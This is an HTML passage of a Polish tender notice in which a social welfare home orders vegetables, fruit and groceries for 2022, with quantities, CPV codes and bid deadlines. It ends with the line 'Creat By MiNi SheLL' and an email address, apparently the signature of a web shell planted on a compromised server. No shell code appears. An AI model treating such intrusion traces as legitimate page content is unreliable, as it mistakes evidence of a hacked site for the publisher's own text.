330<br/>Serek wiejski lekki 150 g szt. 500<br/>Serek wiejski smakowy 150 g szt. 700<br/>Śmietana 18% 400 g szt. 3300<br/>Śmietanka UHT 30% tł 330 ml szt. 10<br/>Twaróg capri kg 300<br/>Twaróg półtłusty, krajanka kg 1 800 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Agrest kg 2<br/>Arbuz kg 700<br/>Banany kg 1000<br/>Borówka amerykańska kg 2<br/>Botwina kg 20<br/>Brokuł szt. 50<br/>Brukselka kg 5<br/>Brzoskwinie kg 200<br/>Burak ćwikłowy kg 1500<br/>Cebula kg 1200<br/>Cebula czerwona kg 70<br/>Cytryny kg 700<br/>Czereśnie kg 10<br/>Czosnek główka szt. 120<br/>Fasolka szparagowa kg 40<br/>Gruszki kg 1000<br/>Jabłka kg 4000<br/>Kalafior świeży szt. 70<br/>Kapusta biała kg 1600<br/>Kapusta czerwona kg 250<br/>Kapusta kwaszona kg 850<br/>Kapusta młoda szt. 300<br/>Kapusta pekińska kg 380<br/>Kiwi kg 2<br/>Koper kg 80<br/>Maliny kg 2<br/>Mandarynki kg 450<br/>Marchew kg 5100<br/>Melon żółty miodowy kg 10<br/>Morele kg 100<br/>Natka pietruszki kg 35<br/>Nektarynki kg 300<br/>Ogórki gruntowe kg 400<br/>Ogórki kwaszone kg 900<br/>Ogórki szklarniowe, sałatkowe kg 1100<br/>Papryka czerwona, żółta kg 600<br/>Pieczarki kg 300<br/>Pietruszka korzeń kg 600<br/>Pomarańcze kg 800<br/>Pomidory kg 2600<br/>Por kg 400<br/>Porzeczka czerwona, czarna kg 30<br/>Przyprawa-koper do ogórków szt. 30<br/>Roszponka kg 1<br/>Rukola kg 1<br/>Rzepa sopel kg 380<br/>Rzodkiewka szt. 1100<br/>Sałata lodowa szt. 700<br/>Sałata mix szt. 3<br/>Sałata zielona szt. 1300<br/>Seler korzeń kg 1000<br/>Seler naciowy kg 1<br/>Susz owocowy kg 30<br/>Szczypior szt. 1700<br/>Szpinak kg 3<br/>Śliwki kg 300<br/>Truskawki kg 300<br/>Winogrona kg 15<br/>Wiśnie kg 30<br/>Ziemniaki kg 23000<br/>Ziemniaki młode kg 6000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ananas puszka plastry 580g szt. 250<br/>Baton bezglutenowy Raw 50g szt. 20<br/>Baton owocowy bez cukru Raw 35 g szt. 2100<br/>Bazylia 10g szt. 50<br/>Beskidzkie mini krakersy 100g szt. 2800<br/>Biszkopty b/ cukru 100g np.. Mamut szt. 450<br/>Biszkopty bezglutenowe 85 g szt. 25<br/>Biszkopty Leonki 90g szt. 1700<br/>Brzoskwinia w syropie puszka 850g szt. 10<br/>Budyń bez cukru 500g różne smaki kg 30<br/>Bułka tarta 500g kg 300<br/>Bułka tarta bezglutenowa 500g np. Belviten kg 2<br/>Chrupki kukurydziane 50g typu Flips szt. 700<br/>Chrupki ryżowe 75g szt. 10<br/>Chrzan delikatesowy Mosso 250g lub Laskol szt. 500<br/>Ciasteczka maślane b/cukru 125 g np. Jutrzenka szt. 100 <br/>Ciasteczka owsiane bez cukru 150g np.. Ania szt. 200<br/>Ciasteczka śniadaniowe b/ cukru Sante 50g – różne szt. 1900<br/>Ciastka korzenne lub miodowe lub pierniki toruńskie z polewą lub nadziewane kg 10<br/>Ciastka kruche z marmoladą, z polewą lukrową lub polewą czekoladową kg 20<br/>Ciastka maślane niskobiałkowe 150g szt. 25<br/>Ciastka w polewie czekoladowej biszkoptowe lub herbatniki kg 10<br/>Cieciorka konserwowa 400g szt. 10<br/>Cukier 1 kg kg 4500<br/>Cukier puder 400g kg 10<br/>Cukier waniliowy ok.30g szt. 300<br/>Cynamon 20g szt. 50<br/>Czosnek granulowany 20g szt. 390<br/>Ćwikła z chrzanem 300 g Laskol szt. 500<br/>Dżem bez cukru na fruktozie(dla diabetyków) 200g szt. 350<br/>Dżem owocowy na 1 osobę 25g szt. 3000<br/>Fasola biała 400g drobna,średnia kg 150<br/>Fasola biała konserwowa 400 g szt. 20<br/>Fasola czerwona konserwowa 400g szt. 200<br/>Galaretka owocowa różne smaki 75g szt. 1400<br/>Galaretka owocowa bez cukru 75g szt. 400<br/>Gałka muszkatołowa mielona 10 g szt. 10<br/>Gofry 250g(6 szt) np. Dane Cake szt. 400<br/>Gofry naturalne b/ cukru 65 g np.. Ania szt. 200<br/>Goździki 10 g szt. 10<br/>Groch połówki 400g kg 150<br/>Groszek konserwowy Kotlin 400g szt. 500<br/>Grześki truskawkowe, śmietankowe 26g bez polewy szt. 1800<br/>Herbata czarna liściasta 100 g - Assam szt. 1200<br/>Herbata czarna liściasta 100g Lipton szt. 5<br/>Herbatniki 50g typu Krakus, Szkolne szt. 3000<br/>Herbatniki Be-be 16 g szt. 1500<br/>Herbatniki bez cukru 135 g szt. 300<br/>Kakao 100g Wedel szt. 130<br/>Kasza gryczana prażona 1 kg kg 170<br/>Kasza jaglana kg 40<br/>Kasza jęczmienna 1 kg kg 200<br/>Kasza kus- kus kg 20<br/>Kasza manna 1 kg kg 300<br/>Kasza pęczak 1kg kg 200<br/>Kaszka ryżowa bezmleczna, kleik bez cukru 160 g szt. 50<br/>Kawa Inka 150g szt. 1000<br/>Ketchup 500g łagodny Pudliszki szt. 400<br/>Kisiel 500g bez cukru różne smaki szt. 200<br/>Koncentrat barszcz czerwony Krakus 300ml szt. 70<br/>Koncentrat pomidorowy 30% 200g Dawton szt. 50<br/>Koncentrat pomidorowy 30% 900g MK szt. 350<br/>Koncentrat żurek Krakus 300ml szt. 30<br/>Kostki rosołowe 60g drobiowe, szt. 2500<br/>Kostki rosołowe wołowe 60 g szt. 100<br/>Kukurydza konserwowa Dafton 400g szt. 470<br/>Kwasek cytrynowy 20g szt. 400<br/>Liść laurowy 10g szt. 400<br/>Lu Petitki Lubisie różne 30g szt. 1000<br/>Majeranek 15g szt. 380<br/>Majonez minimum 60% tłuszczu 900 ml Mosso szt. 400<br/>Makaron 1 kg &#34;Polskie Młyny&#34; 100% pszenicy durum kg 350<br/>Makaron 1 kg &#34;Polskie Młyny&#34; żytni kg 30<br/>Makaron 1kg Lubella 100% pszenicy durum różny kg 400<br/>Makaron bezglutenowy różny kg 20<br/>Mamutki – ciastka biszkoptowe b/cukru 20g szt. 200<br/>Marmolada wieloowocowa ,tradycyjna 1000 g kg 5<br/>Masa makowa z bakaliami 800-1000g szt. 12<br/>Mąka 1 kg typ 450 tortowa kg 1850<br/>Mąka bezglutenowa uniwersalna kg 20<br/>Mąka kukurydziana kg 5<br/>Mąka ryżowa kg 5<br/>Mąka ziemniaczana 1 kg kg 50<br/>Mieszanka czekoladowa- cukierki w polewie z zawartością 22% czekolady kg 10<br/>Mieszanka owocowa, galaretka w cukrze kg 10<br/>Mini wafelki 150g szt. 700<br/>Miód naturalny 1 kg szt. 100<br/>Miód naturalny pszczeli na 1 osobę 25g szt. 3700<br/>Mleko niesłodzone zagęszczane 7,5% tłuszczu 500ml szt. 5<br/>Morele suszone 200g szt. 10<br/>Musztarda 180g chrzanowa, miodowa, stołowa Rolewski-łagodna szt. 700<br/>Ocet 10% spirytusowy 0,5 l szt. 100<br/>Ogórki korniszony w słoikach 0,9 l. szt. 800<br/>Olej rzepakowy 100% 1L- rafinowany szt. 2000<br/>Orzechy włoskie 100g szt. 10<br/>Papryka ostra 20 g szt. 50<br/>Papryka słodka 20 g szt. 150<br/>Pestki słonecznika 200 szt szt. 10<br/>Pieczywa chrupki Sonko bez cukru 170 g - różne szt. 70<br/>Pieprz cytrynowy mielony 20g szt. 100<br/>Pieprz naturalny czarny 20g szt. 350<br/>Pieprz ziołowy 15g szt. 600<br/>Płatki jęczmienne błyskawiczne 500g kg 300<br/>Płatki kukurydziane bezglutenowe 500 g Nestle szt. 30<br/>Płatki migdałów 100 g szt. 5<br/>Płatki owsiane bez glutenowe 500 g kg 3<br/>Płatki owsiane zwykłe 500 g kg 600<br/>Płatki ryżowe 400 g kg 300<br/>Proszek do pieczenia 30 g szt. 30<br/>Przyprawa curry 20g szt. 50<br/>Przyprawa do flaków 20g szt. 50<br/>Przyprawa sucha Kucharek 1kg kg 300<br/>Przyprawa w płynie 1L Winiary szt. 70<br/>Rodzynki 200g kg 30<br/>Ryż biały długoziarnisty 1 kg kg 350<br/>Słodzik Stewia – 200 tabletek szt. 60<br/>Słomka ptysiowa b/ cukru 30g szt. 200<br/>Soczek owocowo-warzywny 300 g bez cukru szt. 1300<br/>Soczek owocowy 300g bez cukru szt. 1500<br/>Soczek owocowy bez cukru 200 ml szt. 3300<br/>Soczek warzywny pomidorowy bez cukru 300g szt. 1800<br/>Soczek warzywny z buraka 300g bez cukru szt. 1500<br/>Soczek wielowarzywny bez cukru 250 ml szt. 300<br/>Soczewica czerwona 350g kg 80<br/>Soda oczyszczona do celów spożywczych 50g szt. 10<br/>Sos czosnkowy np. Mosso 250 ml szt. 400<br/>Sos ogrodowy 700g Knor szt. 10<br/>Sos tatarski np. Mosso 260 ml szt. 500<br/>Sól 1kg różna kg 550<br/>Syrop owocowy 430ml Paola, Gellwe, Łowicz – porzeczka, wiśnia, malina, truskawka szt. 850<br/>Szczaw konserwowy 290g.Laskol szt. 400<br/>Śliwka kalifornijska 200g szt. 10<br/>Wafle bez cukru listki nyskie 38g szt. 500<br/>Wafle ryżowe 130 g typu Sonko szt. 20<br/>Wafle śmietankowe, orzechowe ,o smaku chałwy z nadzieniem owocowym lub kisielu kg 10<br/>Ziele angielskie 15g szt. 370<br/>Zioła prowansalskie 10g szt. 20<br/>Zupa ogonowa 500g Knorr szt. 80<br/>Żelatyna spożywcza zwykła wp. 50g szt. 200<br/>Herbata owocowa-np. Herbapol różne smaki 25 szt po 2 g op. 200<br/>Papryka konserwowa 720g szt. 100<br/>Pasztet białostocki z drobiem 100g szt. 300<br/>Szynka wieprzowa konserwowa -konserwa 110g szt. 300<br/>Żurawina suszona 200g szt. 10<br/>Śliwka w czekoladzie kg 10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Dom Pomocy Społecznej, ul. Świerkowa 9</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-30 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com